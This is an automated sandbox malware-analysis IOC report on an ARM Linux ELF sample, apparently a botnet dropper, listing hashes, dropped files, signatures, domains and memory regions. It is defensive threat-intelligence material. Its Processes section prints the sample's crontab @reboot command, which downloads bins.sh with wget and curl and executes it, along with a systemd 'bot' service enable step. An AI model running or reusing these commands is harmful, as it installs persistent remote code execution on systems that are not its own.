Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

armv4l.elf

ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy:	6.108229534208223
Filename:	armv4l.elf
Filesize:	78696
MD5:	b1de6afb7105e0da26b1a219f9f5031a
SHA1:	e1b3179ec8a6646d27e522414487497720a273a8
SHA256:	ad9ce965f543f4b0e2993d08f40bcb29753c9020b4093f4db2f894745c53c9ea
SHA512:	8b0e05228979c21fe6a938e003bed521760b306860d12ccba026067511c9490ce752cb6c3232d506ebcb44cc502c0e69dd5ed260d7cc8c49b96c830e1dae7608
SSDEEP:	1536:lxu6Nt3LUDmK+Y104tirDuaXy7K41N/DAzdLvws/:lk6N9LUxti3FmK4n8tws/
Preview:	.ELF...a..........(.........4...`1......4. ...(.......................................... ... ... .......f..........Q.td..................................-...L."....@..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery

/root/.bashrc

ASCII text

dropped

Details

File:	/root/.bashrc
Category:	dropped
Dump:	.bashrc.13.dr
ID:	dr_0
Target ID:	13
Process:	/tmp/armv4l.elf
Type:	ASCII text
Entropy:	4.358630015292201
Encrypted:	false
Ssdeep:	3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
Size:	178
Whitelisted:	false
Reputation:	moderate

Signature Hits	Behavior Group	Mitre Attack
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories

/var/spool/cron/crontabs/tmp.csTjpj

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.csTjpj
Category:	dropped
Dump:	tmp.csTjpj.22.dr
ID:	dr_2
Target ID:	22
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.096705576725245
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLvjBMvZHGMQ5UYLtCFt3HY8jsHB:8QjHig8iJeHLUHY8mB
Size:	235
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

/memfd:snapd-env-generator (deleted)

ASCII text

dropped

Details

File:	/memfd:snapd-env-generator (deleted)
Category:	dropped
Dump:	memfd_snapd-env-generator (deleted).38.dr
ID:	dr_3
Target ID:	38
Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Type:	ASCII text
Entropy:	3.7627880354948586
Encrypted:	false
Ssdeep:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
Size:	76
Whitelisted:	false
Reputation:	moderate

/usr/lib/systemd/system/bot.service

ASCII text

dropped

Details

File:	/usr/lib/systemd/system/bot.service
Category:	dropped
Dump:	bot.service.13.dr
ID:	dr_1
Target ID:	13
Process:	/tmp/armv4l.elf
Type:	ASCII text
Entropy:	4.9110117370593995
Encrypted:	false
Ssdeep:	6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
Size:	356
Whitelisted:	false
Reputation:	moderate

Processes

Path

Cmdline

Malicious

/tmp/armv4l.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/bin/sh

/usr/bin/sh

sh bins.sh

/bin/sh

/bin/curl

/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/usr/bin/sh

sh bins.sh

/bin/sh

/usr/bin/crontab

crontab -

/tmp/armv4l.elf

/bin/sh

sh -c "/bin/systemctl enable bot"

/bin/sh

/bin/systemctl

/bin/systemctl enable bot

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

There are 17 hidden processes, click here to show them.

URLs

Name

Malicious

http://serverip/bins/bins.sh

unknown

Details

Name:	http://serverip/bins/bins.sh
TargetID:	22
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.csTjpj.22.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

http://serverip/bins/bins.sh;

unknown

Details

Name:	http://serverip/bins/bins.sh;
TargetID:	13
From Memory:	true
Current Path:	/tmp/armv4l.elf
Source:	bot.service.13.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.24

Details

Name:	daisy.ubuntu.com
IP:	162.213.35.24
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

host.zopz-api.com

172.111.38.48

Details

Name:	host.zopz-api.com
IP:	172.111.38.48
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

172.111.38.48

host.zopz-api.com

Reserved

Memdumps

Base Address

Regiontype

Protect

Malicious

7ff284032000

page read and write

7ff38c6be000

page read and write

565387840000

page read and write

565389855000

page read and write

7ff38b1dc000

page read and write

7ff384021000

page read and write

7ff38ba76000

page read and write

7ff284039000

page read and write

7ff383fff000

page read and write

7ff38bdd8000

page read and write

7ff284029000

page execute read

7ff38b9e4000

page read and write

7ff38c595000

page read and write

7ff38c1d2000

page read and write

56538983e000

page execute and read and write

7ff38c6be000

page read and write

5653875e6000

page execute read

5653899df000

page read and write

5653899ff000

page read and write

7ff38b9e4000

page read and write

7ff38bdd8000

page read and write

7ff38c1d2000

page read and write

5653875e6000

page execute read

565387837000

page read and write

7ff38c6e2000

page read and write

7ff38c043000

page read and write

7ff383fff000

page read and write

7fff0a9d4000

page execute read

7ff38ba76000

page read and write

7ff284039000

page read and write

7ff384021000

page read and write

7ff38c3b4000

page read and write

7ff284032000

page read and write

565387837000

page read and write

7ff38c066000

page read and write

7ff38c3b4000

page read and write

7ff38c043000

page read and write

7fff0a8da000

page read and write

7ff38c595000

page read and write

5653899df000

page read and write

7fff0a8da000

page read and write

7ff284029000

page execute read

7ff38c6e2000

page read and write

7ff38c727000

page read and write

7ff38c727000

page read and write

7ff38c066000

page read and write

7fff0a9d4000

page execute read

56538983e000

page execute and read and write

565389855000

page read and write

7ff38b1dc000

page read and write

565387840000

page read and write

7ff28403b000

page read and write

There are 42 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
armv4l.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarmv4l.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
armv4l.elf